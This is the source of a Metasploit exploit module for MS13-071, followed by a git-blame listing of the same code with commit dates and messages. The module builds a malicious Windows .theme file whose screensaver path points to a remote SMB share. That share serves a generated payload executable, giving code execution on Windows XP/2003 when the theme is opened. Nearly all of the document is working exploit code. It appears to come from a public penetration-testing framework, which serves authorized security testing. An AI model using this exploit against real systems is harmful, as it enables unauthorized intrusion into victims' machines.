modules/exploits/windows/fileformat/ms13_071_theme.rb

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::FILEFORMAT
  include Msf::Exploit::EXE
  include Msf::Exploit::Remote::SMB::Server::Share

  def initialize(info={})
    super(update_info(info,
      'Name'           => "MS13-071 Microsoft Windows Theme File Handling Arbitrary Code Execution",
      'Description'    => %q{
        This module exploits a vulnerability mainly affecting Microsoft Windows XP and Windows
        2003. The vulnerability exists in the handling of the Screen Saver path, in the [boot]
        section. An arbitrary path can be used as screen saver, including a remote SMB resource,
        which allows for remote code execution when a malicious .theme file is opened, and the
        "Screen Saver" tab is viewed. The code execution is also triggered if the victim installs
        the malicious theme and stays away from the computer, when Windows tries to display the
        screensaver.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Eduardo Prado', # Vulnerability discovery
          'juan vazquez', # Metasploit module
          'Matthew Hall <hallm@sec-1.com>' # Metasploit module refactored to use Msf::Exploit::Remote::SMB::Server::Share
        ],
      'References'     =>
        [
          ['CVE', '2013-0810'],
          ['OSVDB', '97136'],
          ['MSB', 'MS13-071'],
          ['BID', '62176'],
          ['URL', 'http://www.verisigninc.com/en_US/products-and-services/network-intelligence-availability/idefense/public-vulnerability-reports/articles/index.xhtml?id=1040'],
          ['URL', 'https://blog.rapid7.com/2013/09/25/change-the-theme-get-a-shell']
        ],
      'Payload'        =>
        {
          'Space'       => 2048,
          'DisableNops' => true
        },
      'DefaultOptions' =>
        {
          'DisablePayloadHandler' => false
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          ['Windows XP SP3 / Windows 2003 SP2', {}],
        ],
      'Privileged'     => false,
      'DisclosureDate' => "Sep 10 2013",
      'DefaultTarget'  => 0))

      register_options(
        [
          OptString.new('FILENAME', [true, 'The theme file', 'msf.theme']),
          OptString.new('FILE_NAME', [ false, 'SCR File name to share', 'msf.scr'])
        ])

      deregister_options('FOLDER_NAME')
      deregister_options('FILE_CONTENTS')
  end

  def primer
    self.file_contents = generate_payload_exe
    print_status("Malicious SCR available on #{unc}...")

    # Default Windows XP / 2003 theme modified
    print_status("Creating '#{datastore['FILENAME']}' file ...")
    theme = <<-EOF
; Copyright (c) Microsoft Corp. 1995-2001

[Theme]
DisplayName=@themeui.dll,-2016

; My Computer
[CLSID\\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\\DefaultIcon]
DefaultValue=%WinDir%explorer.exe,0

; My Documents
[CLSID\\{450D8FBA-AD25-11D0-98A8-0800361B1103}\\DefaultIcon]
DefaultValue=%WinDir%SYSTEM32\\mydocs.dll,0

; My Network Places
[CLSID\\{208D2C60-3AEA-1069-A2D7-08002B30309D}\\DefaultIcon]
DefaultValue=%WinDir%SYSTEM32\\shell32.dll,17

; Recycle Bin
[CLSID\\{645FF040-5081-101B-9F08-00AA002F954E}\\DefaultIcon]
full=%WinDir%SYSTEM32\\shell32.dll,32
empty=%WinDir%SYSTEM32\\shell32.dll,31

[Control Panel\\Desktop]
Wallpaper=
TileWallpaper=0
WallpaperStyle=2
Pattern=
ScreenSaveActive=0

[boot]
SCRNSAVE.EXE=#{unc}

[MasterThemeSelector]
MTSM=DABJDKT
    EOF
    file_create(theme)
  end
end
Add module for MS13-071 2013-09-18 13:40:35 -05:00			`##`
use https for metaploit.com links 2017-07-24 06:26:21 -07:00			`# This module requires Metasploit: https://metasploit.com/download`
Redo the boilerplate / splat 2013-10-15 13:50:46 -05:00			`# Current source: https://github.com/rapid7/metasploit-framework`
Add module for MS13-071 2013-09-18 13:40:35 -05:00			`##`

use MetasploitModule as a class name 2016-03-08 14:02:44 +01:00			`class MetasploitModule < Msf::Exploit::Remote`
Add module for MS13-071 2013-09-18 13:40:35 -05:00			`Rank = ExcellentRanking`

			`include Msf::Exploit::FILEFORMAT`
			`include Msf::Exploit::EXE`
Modify SMB generation code to use primer based on #3074 changes to 2015-02-20 11:35:22 +00:00			`include Msf::Exploit::Remote::SMB::Server::Share`
Add module for MS13-071 2013-09-18 13:40:35 -05:00
			`def initialize(info={})`
			`super(update_info(info,`
			`'Name' => "MS13-071 Microsoft Windows Theme File Handling Arbitrary Code Execution",`
			`'Description' => %q{`
			`This module exploits a vulnerability mainly affecting Microsoft Windows XP and Windows`
			`2003. The vulnerability exists in the handling of the Screen Saver path, in the [boot]`
			`section. An arbitrary path can be used as screen saver, including a remote SMB resource,`
			`which allows for remote code execution when a malicious .theme file is opened, and the`
Update descriptions for clarity. 2013-09-23 13:48:23 -05:00			`"Screen Saver" tab is viewed. The code execution is also triggered if the victim installs`
Complete MS13-071 Information 2013-09-21 21:22:34 -05:00			`the malicious theme and stays away from the computer, when Windows tries to display the`
			`screensaver.`
Add module for MS13-071 2013-09-18 13:40:35 -05:00			`},`
			`'License' => MSF_LICENSE,`
			`'Author' =>`
			`[`
			`'Eduardo Prado', # Vulnerability discovery`
Refactor ms13_071_theme to utilise `Msf::Exploit::Remote::SMBFileServer` 2014-04-30 12:14:58 +01:00			`'juan vazquez', # Metasploit module`
Do cleanup 2015-03-04 10:33:57 -06:00			`'Matthew Hall <hallm@sec-1.com>' # Metasploit module refactored to use Msf::Exploit::Remote::SMB::Server::Share`
Add module for MS13-071 2013-09-18 13:40:35 -05:00			`],`
			`'References' =>`
			`[`
			`['CVE', '2013-0810'],`
Revert "Land #6812 , remove broken OSVDB references" 2016-07-15 12:00:31 -05:00			`['OSVDB', '97136'],`
Add module for MS13-071 2013-09-18 13:40:35 -05:00			`['MSB', 'MS13-071'],`
Complete MS13-071 Information 2013-09-21 21:22:34 -05:00			`['BID', '62176'],`
Add Metasploit blog references 2013-10-01 20:50:16 -05:00			`['URL', 'http://www.verisigninc.com/en_US/products-and-services/network-intelligence-availability/idefense/public-vulnerability-reports/articles/index.xhtml?id=1040'],`
This fixes broken links to the community.rapid7.com blog 2020-02-18 08:58:30 -06:00			`['URL', 'https://blog.rapid7.com/2013/09/25/change-the-theme-get-a-shell']`
Add module for MS13-071 2013-09-18 13:40:35 -05:00			`],`
			`'Payload' =>`
			`{`
			`'Space' => 2048,`
			`'DisableNops' => true`
			`},`
			`'DefaultOptions' =>`
			`{`
remove various module hacks for the datastore defaults not preserving types 2016-03-05 23:11:39 -06:00			`'DisablePayloadHandler' => false`
Add module for MS13-071 2013-09-18 13:40:35 -05:00			`},`
			`'Platform' => 'win',`
			`'Targets' =>`
			`[`
			`['Windows XP SP3 / Windows 2003 SP2', {}],`
			`],`
			`'Privileged' => false,`
			`'DisclosureDate' => "Sep 10 2013",`
			`'DefaultTarget' => 0))`
Fix indenting and use primer 2015-03-04 10:46:34 -06:00
			`register_options(`
Add module for MS13-071 2013-09-18 13:40:35 -05:00			`[`
Fix indenting and use primer 2015-03-04 10:46:34 -06:00			`OptString.new('FILENAME', [true, 'The theme file', 'msf.theme']),`
			`OptString.new('FILE_NAME', [ false, 'SCR File name to share', 'msf.scr'])`
Fix msf/core and self.class msftidy warnings 2017-05-03 15:42:21 -05:00			`])`
Fix indenting and use primer 2015-03-04 10:46:34 -06:00
Deregister FOLDER_NAME on exploit modules 2015-03-05 12:27:12 -06:00			`deregister_options('FOLDER_NAME')`
Fix indenting and use primer 2015-03-04 10:46:34 -06:00			`deregister_options('FILE_CONTENTS')`
Add module for MS13-071 2013-09-18 13:40:35 -05:00			`end`

Fix indenting and use primer 2015-03-04 10:46:34 -06:00			`def primer`
Modify primer to utilise file_contents macro. 2015-03-04 09:52:00 +00:00			`self.file_contents = generate_payload_exe`
Modify SMB generation code to use primer based on #3074 changes to 2015-02-20 11:35:22 +00:00			`print_status("Malicious SCR available on #{unc}...")`
Do cleanup 2015-03-04 10:33:57 -06:00
Add module for MS13-071 2013-09-18 13:40:35 -05:00			`# Default Windows XP / 2003 theme modified`
Do cleanup 2015-03-04 10:33:57 -06:00			`print_status("Creating '#{datastore['FILENAME']}' file ...")`
Add module for MS13-071 2013-09-18 13:40:35 -05:00			`theme = <<-EOF`
Knock out a Unicode character 2013-09-23 14:22:11 -05:00			`; Copyright (c) Microsoft Corp. 1995-2001`
Add module for MS13-071 2013-09-18 13:40:35 -05:00
			`[Theme]`
			`DisplayName=@themeui.dll,-2016`

			`; My Computer`
			`[CLSID\\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\\DefaultIcon]`
			`DefaultValue=%WinDir%explorer.exe,0`

			`; My Documents`
			`[CLSID\\{450D8FBA-AD25-11D0-98A8-0800361B1103}\\DefaultIcon]`
			`DefaultValue=%WinDir%SYSTEM32\\mydocs.dll,0`

			`; My Network Places`
			`[CLSID\\{208D2C60-3AEA-1069-A2D7-08002B30309D}\\DefaultIcon]`
			`DefaultValue=%WinDir%SYSTEM32\\shell32.dll,17`

			`; Recycle Bin`
			`[CLSID\\{645FF040-5081-101B-9F08-00AA002F954E}\\DefaultIcon]`
			`full=%WinDir%SYSTEM32\\shell32.dll,32`
			`empty=%WinDir%SYSTEM32\\shell32.dll,31`

			`[Control Panel\\Desktop]`
			`Wallpaper=`
			`TileWallpaper=0`
			`WallpaperStyle=2`
			`Pattern=`
			`ScreenSaveActive=0`

			`[boot]`
Do cleanup 2015-03-04 10:33:57 -06:00			`SCRNSAVE.EXE=#{unc}`
Add module for MS13-071 2013-09-18 13:40:35 -05:00
			`[MasterThemeSelector]`
			`MTSM=DABJDKT`
			`EOF`
			`file_create(theme)`
			`end`
			`end`